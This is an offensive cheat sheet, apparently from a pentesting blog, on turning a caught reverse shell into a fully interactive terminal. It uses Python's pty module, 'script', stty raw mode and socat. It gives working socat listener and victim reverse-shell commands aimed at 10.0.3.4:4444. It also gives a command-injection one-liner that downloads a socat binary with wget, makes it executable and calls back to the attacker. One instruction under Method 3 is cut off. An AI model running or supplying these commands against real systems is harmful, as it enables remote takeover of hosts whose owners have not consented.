Method 1: Python pty module
One of my go-to commands for a long time after catching a dumb shell was to use Python to spawn a pty. The pty module let’s you spawn a psuedo-terminal that can fool commands like
su into thinking they are being executed in a proper terminal. Spawn
/bin/bash using Python’s PTY module, and connect the controlling shell with its standard I/O. To upgrade a dumb shell, simply run the following command:
python -c 'import pty; pty.spawn("/bin/bash")'
This will let you run
su for example (in addition to giving you a nicer prompt)
Method 2: Shell to Bash
Upgrade from shell to bash.
SHELL=/bin/bash script -q /dev/null
Method 3: Fully Interactive TTY
Background the current remote shell (
^Z), update the local terminal line settings with
stty2 and bring the remote shell back.
stty raw -echo && fg
After bringing the job back the cursor will be pushed to the left. Reinitialize the terminal with
Method 4: Using socat
socat is like netcat on steroids and is a very powerfull networking swiss-army knife. Socat can be used to pass full TTY’s over TCP connections.
socat is installed on the victim server, you can launch a reverse shell with it. You must catch the connection with
socat as well to get the full functions.
The following commands will yield a fully interactive TTY reverse shell:
On Kali (listen):
socat file:`tty`,raw,echo=0 tcp-listen:4444
On Victim (launch):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
If socat isn’t installed, you’re not out of luck. There are standalone binaries that can be downloaded from this awesome Github repo:
With a command injection vuln, it’s possible to download the correct architecture
socat binary to a writable directoy, chmod it, then execute a reverse shell in one line:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
On Kali, you’ll catch a fully interactive TTY session. It supports tab-completion, SIGINT/SIGSTP support, vim, up arrow history, etc. It’s a full terminal. Pretty sweet.